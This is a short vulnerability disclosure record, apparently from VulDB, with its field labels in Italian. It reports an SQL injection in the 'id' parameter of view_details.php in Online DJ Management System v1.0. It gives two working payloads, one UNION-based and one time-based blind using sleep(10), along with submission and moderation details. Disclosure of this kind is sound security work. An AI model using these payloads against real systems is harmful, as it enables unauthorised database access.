| Titolo | Online DJ Management System v1.0 /odjms/admin/bookings/view_details.php GET parameter id exists SQL injection vulnerability |
|---|
| Descrizione | An issue was discovered in Online DJ Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /odjms/admin/bookings/view_details.php?id.
Payload1:id=-1) union all select null,concat(0x717273,0x5556575859),null,null,null,null,null,null,null,null,null,null,null,null,null-- -
Payload2:id=1) and (select 2 from (select(sleep(10)))x) and (3=3
|
|---|
| Fonte | ⚠️ https://github.com/ShellHunTerAndyLABA/bug_report/blob/main/SQLi-1.md |
|---|
| Utente | Andy_LB (UID 45991) |
|---|
| Sottomissione | 01/05/2023 11:50 (3 anni fa) |
|---|
| Moderazione | 01/05/2023 17:45 (6 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 227795 [SourceCodester Online DJ Management System 1.0 GET Parameter view_details.php ID iniezione SQL] |
|---|
| Punti | 20 |
|---|